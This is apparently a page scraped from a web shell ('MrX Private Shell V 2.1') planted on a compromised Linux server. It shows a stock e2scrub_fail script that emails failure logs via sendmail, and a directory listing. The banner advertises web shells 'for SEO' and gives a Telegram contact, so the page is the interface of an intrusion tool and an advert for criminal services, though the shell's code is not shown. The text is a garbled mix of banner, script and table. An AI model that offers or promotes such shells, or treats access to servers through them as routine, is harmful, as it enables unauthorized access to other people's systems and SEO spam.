__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/bash
# Email logs of failed e2scrub unit runs when the systemd service fails.
mntpoint="$1"
test -z "${mntpoint}" && exit 0
if ! type sendmail > /dev/null 2>&1; then
echo "$0: sendmail program not found."
exit 1
fi
if test -f /etc/e2scrub.conf ; then
. /etc/e2scrub.conf
fi
hostname="$(hostname -f 2>/dev/null)"
test -z "${hostname}" && hostname="${HOSTNAME}"
service_name="$(systemd-escape --template "[email protected]" --path "${mntpoint}")"
if test -z "${recipient}" ; then
recipient="root"
fi
if test -z "${sender}" ; then
sender="<e2scrub@${hostname}>"
fi
(cat << ENDL
To: ${recipient}
From: ${sender}
Subject: e2scrub failure on ${mntpoint}
So sorry, the automatic e2scrub of ${mntpoint} on ${hostname} failed.
A log of what happened follows:
ENDL
systemctl status --full --lines 4294967295 "${service_name}") | sendmail -t -i
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| e2scrub_all_cron | File | 1.93 KB | 0755 |
|
| e2scrub_fail | File | 863 B | 0755 |
|